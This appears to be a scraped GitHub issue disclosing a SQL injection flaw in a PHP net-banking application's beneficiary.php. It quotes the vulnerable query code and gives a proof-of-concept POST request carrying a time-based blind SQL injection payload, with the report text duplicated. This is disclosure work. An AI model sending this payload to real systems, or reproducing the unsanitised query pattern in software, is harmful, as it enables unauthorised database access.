net-banking/beneficiary.php from line 74,The $_POST['search'] parameter is controllable, the parameter search can be passed through post, and the $search is not protected from sql injection, line 92 $result1 = $conn->query($sql1); made a sql query,resulting in sql injection
......
......
......
if (isset($_POST['submit'])) {
$back_button = TRUE;
$search = $_POST['search'];
$by = $_POST['by'];
if ($by == "name") {
$sql1 = "SELECT cust_id, first_name, last_name, account_no FROM customer WHERE cust_id=".$row["benef_cust_id"]." AND (first_name LIKE '%$search%' OR last_name LIKE '%$search%' OR CONCAT(first_name, ' ', last_name) LIKE '%$search%')";
}
else {
$sql1 = "SELECT cust_id, first_name, last_name, account_no FROM customer WHERE cust_id=".$row["benef_cust_id"]." AND account_no LIKE '$search'";
}
}
......
......
......
<?php$result1 = $conn->query($sql1);
......
......
......
POC
POST /net-banking/beneficiary.php HTTP/1.1Host: www.bank.netUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:94.0) Gecko/20100101 Firefox/94.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateConnection: closeUpgrade-Insecure-Requests: 1Content-Type: application/x-www-form-urlencodedCookie: PHPSESSID=m5fjmb3r9rvk4i56cqc22ht3c3Content-Length: 16submit=&search=' AND (SELECT 2893 FROM (SELECT(SLEEP(5)))EXvW)-- WklL
Attack results pictures
The text was updated successfully, but these errors were encountered:
Vulnerability file address
net-banking/beneficiary.phpfrom line 74,The$_POST['search']parameter is controllable, the parameter search can be passed through post, and the$searchis not protected from sql injection, line 92$result1 = $conn->query($sql1);made a sql query,resulting in sql injectionPOC
Attack results pictures
The text was updated successfully, but these errors were encountered: